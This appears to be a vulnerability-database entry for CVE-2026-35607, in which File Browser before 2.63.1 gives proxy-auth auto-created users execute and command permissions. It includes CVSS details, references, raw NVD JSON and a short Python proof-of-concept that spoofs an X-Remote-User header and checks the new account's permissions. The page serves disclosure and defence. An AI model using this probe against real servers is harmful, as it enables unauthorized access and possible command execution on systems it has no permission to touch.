CVE-2026-35607

Description

File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.1, the fix in commit b6a4fb1 ("self-registered users don't get execute perms") stripped Execute permission and Commands from users created via the signup handler. The same fix was not applied to the proxy auth handler. Users auto-created on first successful proxy-auth login are granted execution capabilities from global defaults, even though the signup path was explicitly changed to prevent execution rights from being inherited by automatically provisioned accounts. This vulnerability is fixed in 2.63.1.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE

File Browser < 2.63.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC Concept for CVE-2026-35607: Proxy Auth Permission Inheritance import requests target_url = "http://target-filebrowser.com" # Step 1: Simulate Proxy Authentication to create user # Assuming the reverse proxy sets the X-Remote-User header headers = { "X-Remote-User": "attacker", "X-Remote-Email": "[email protected]" } # Trigger login/creation via proxy session = requests.Session() login_resp = session.get(f"{target_url}/api/public/settings", headers=headers) if login_resp.status_code == 200: print("[+] User potentially created via Proxy Auth.") # Step 2: Attempt to verify execution permissions # In vulnerable versions, this user might inherit 'execute' perms from global defaults # Checking API settings or attempting a command execution endpoint api_resp = session.get(f"{target_url}/api/user") if api_resp.status_code == 200: user_data = api_resp.json() # Check if 'commands' or 'execute' permissions are enabled (LockScreen usually prevents this in fixed versions) perm = user_data.get('perm', {}) if perm.get('execute') or perm.get('commands'): print(f"[!] VULNERABILITY CONFIRMED: User has execution permissions: {perm}") else: print("[-] User does not have execution permissions. Patched or restricted defaults.") else: print("[-] Connection failed.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35607/
[4] VulDB https://vuldb.com/cve/CVE-2026-35607
[5] https://github.com/filebrowser/filebrowser/pull/5890
[6] https://github.com/filebrowser/filebrowser/security/advisories/GHSA-7526-j432-6ppp
[7] https://github.com/filebrowser/filebrowser/security/advisories/GHSA-7526-j432-6ppp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35607", "sourceIdentifier": "[email protected]", "published": "2026-04-07T17:16:34.890", "lastModified": "2026-04-16T18:14:56.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to 2.63.1, the fix in commit b6a4fb1 (\"self-registered users don't get execute perms\") stripped Execute permission and Commands from users created via the signup handler. The same fix was not applied to the proxy auth handler. Users auto-created on first successful proxy-auth login are granted execution capabilities from global defaults, even though the signup path was explicitly changed to prevent execution rights from being inherited by automatically provisioned accounts. This vulnerability is fixed in 2.63.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.63.0", "matchCriteriaId": "54261F6E-C227-4443-97D3-7C18CDAB15C1"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/pull/5890", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-7526-j432-6ppp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-7526-j432-6ppp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}